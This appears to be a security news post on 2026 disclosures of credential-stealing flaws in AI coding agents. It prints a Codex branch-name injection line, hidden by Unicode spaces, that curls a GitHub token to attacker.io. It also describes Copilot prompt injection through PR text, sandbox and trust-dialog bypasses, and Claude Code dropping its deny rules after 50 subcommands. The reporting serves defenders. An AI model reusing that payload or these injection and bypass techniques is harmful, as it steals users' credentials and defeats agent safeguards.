AI Coding Agents Breached - Attackers Took the Keys

Six research teams spent nine months probing AI coding agents. They found command injection in Codex, three CVEs in Claude Code, credential theft via Copilot, and a Google service account handing out read access to every Cloud Storage bucket in a project. Not one attack targeted the models. Every single exploit went after the credentials the agents were holding.

The disclosures - spread across March and April 2026 and synthesized in a VentureBeat analysis - expose a structural problem in how enterprises are rolling out AI coding tools. The agents authenticate. The agents have OAuth tokens and API keys and service accounts. And IAM systems that govern human privilege escalation weren't built to track any of it.

TL;DR

Six exploits across Codex, Claude Code, Copilot, and Vertex AI - all targeting runtime credentials, not models
Codex let attackers steal GitHub OAuth tokens via unsanitized branch names, hiding the payload in 94 Unicode ideographic spaces
Claude Code had three separate vulnerabilities in one month: two CVEs and an undocumented 50-subcommand security bypass
Only 21.9% of organizations have enrolled AI agent credentials in a privileged access management system (Gravitee, 2026)
CrowdStrike CTO at RSAC 2026: "An agent acting on your behalf should never have more privileges than you do"

The Attack Pattern

The attacks don't share an exploit technique. They share a structural assumption: the AI coding agent holds real credentials, operates without a human session anchoring the request, and authenticates to production systems on its own. Once you know that, the attack surface becomes obvious.

Every exploit followed the same path. Identify what the agent carries. Find a way to extract it or redirect it. IAM never saw the agent as a principal worth watching, so nothing fired.

A keyboard with login credentials visible, illustrating the risk of exposed tokens in automated pipelines AI coding agents carry OAuth tokens, GitHub credentials, and cloud service accounts - often without the same audit trail that governs human logins. Source: unsplash.com

What Each Agent Exposed

Codex: A Branch Name That Wasn't a Branch Name

BeyondTrust's Phantom Labs - Tyler Jespersen with Fletcher Davis and Simon Stewart - disclosed the Codex finding on March 30. The root cause was simple: the GitHub branch name parameter in Codex's HTTP POST request flowed unsanitized into the container setup script. A semicolon turned it into a command. A backtick subshell exfiltrated the token.

The obfuscation technique was clean. Ninety-four Unicode Ideographic Space characters (U+3000) pushed the malicious payload off the visible part of the branch name, so the Codex UI showed only main while the hidden payload ran silently during container setup.

main　　　...(94x)...　; curl https://attacker.io/$(cat $GH_TOKEN) || true

The payload stole both user-level GitHub OAuth tokens and broader installation access tokens used for automated code reviews. OpenAI classified it Critical P1. Disclosure was in December 2025; the fix shipped February 5, 2026.

Claude Code: Three Vulnerabilities in One Month

Anthropic's Claude Code collected three separate findings in the same disclosure window.

CVE-2026-25723 let an attacker escape file-write sandboxes by piping shell commands - a bypass of the intended execution boundary. CVE-2026-33068 allowed trust dialog suppression via .claude/settings.json permission overrides, meaning an attacker who could write that file could grant themselves shell access without the user seeing a confirmation prompt.

The third flaw was undocumented. Claude Code silently disabled its own security deny rules after a command topped 50 subcommands. The explanation from Adversa, who found it: Claude Code traded "security enforcement for token budget performance" past a threshold. There's no CVE because Anthropic hadn't documented that the rule existed in the first place.

Copilot: The PR as an Attack Vector

Copilot's exposure wasn't a classic injection. Researchers embedded instructions in pull request descriptions and GitHub issue bodies that triggered setting changes when Copilot processed the content. The result was unrestricted shell execution and, from there, credential access.

The attack surface is the problem: any input Copilot reads during normal operation - PRs, issues, commit messages - can carry instructions that influence what the agent does next. That's a much wider surface than a single API parameter.

Vertex AI: The Default Was the Vulnerability

Google's finding required no input manipulation at all. Unit 42 researcher Ofir Shaty found that the default Project Service Account (P4SA) automatically attached to every Vertex AI agent had excessive permissions from the moment it was created.

Stolen P4SA credentials granted unrestricted read access to every Cloud Storage bucket in the project, plus access to internal Google Cloud infrastructure. No exploit required - just the default service account, working as designed.

Security researchers analyzing the OpenAI Codex command injection vulnerability disclosed in March 2026 The Codex vulnerability involved a command injection in the container setup flow that exposed GitHub tokens in cleartext. Source: thehackernews.com

The Affected Products and Fix Status

Agent	Vector	Credential at Risk	Fixed
Codex (ChatGPT web, CLI, SDK, IDE)	Branch name injection	GitHub OAuth + install tokens	Feb 5, 2026
Claude Code	CVE-2026-25723, CVE-2026-33068, subcommand bypass	Shell access, file system	Patches shipped
GitHub Copilot	PR/issue instruction injection	Shell + credential access	Mitigations rolled out
Vertex AI	Default P4SA over-provisioning	All Cloud Storage in project	Permissions tightened

Where It Falls Short

The fixes address the specific bugs. None of them solve the underlying problem, which is that enterprises are launching AI agents with real production credentials and no IAM framework governing those credentials the way it governs human logins.

A Gravitee survey from 2026 found only 21.9% of teams had enrolled AI agent credentials in a privileged access management system. That means roughly 78% of organizations using Codex, Claude Code, Copilot, or Vertex AI have agents running with real tokens that no policy is governing. Cisco's acquisition of Astrix Security for $400M last week was a direct response to this gap - non-human identities have become a real category.

At RSAC 2026, CrowdStrike CTO Elia Zaitsev framed the principle:

"Collapse agent identities back to the human, because an agent acting on your behalf should never have more privileges than you do."

The problem is that most agent deployments don't work that way. An agent clones a repo, writes files, calls external APIs, and authenticates to databases - often with credentials broader than the user who triggered it. The attacks disclosed in this cluster didn't require novel techniques. They required finding the credential and taking it.

The same pattern that drove vibe-coded apps to 69 vulnerabilities is at work here - speed and convenience at deployment time, with security as a follow-on problem. Except here the agents hold credentials, not just generate code.

Three practical steps fall out of the research:

Inventory what your agents carry. Run a service account audit across Vertex AI, GitHub OAuth apps, and any API keys used by Codex or Claude Code. Most security teams don't have this list.
Apply least privilege to agent credentials, not just human credentials. Vertex AI's P4SA over-provisioning was a default. Defaults need to change.
Treat agent inputs as attacker-controlled. Branch names, PR descriptions, issue bodies - if an agent reads it, it's a potential attack channel. Sanitize accordingly.

Codex Security's launch in March positioned AI as a tool for finding vulnerabilities. The irony of this disclosure cycle is that the tools built to find bugs in your code carried credential vulnerabilities of their own.

Sources: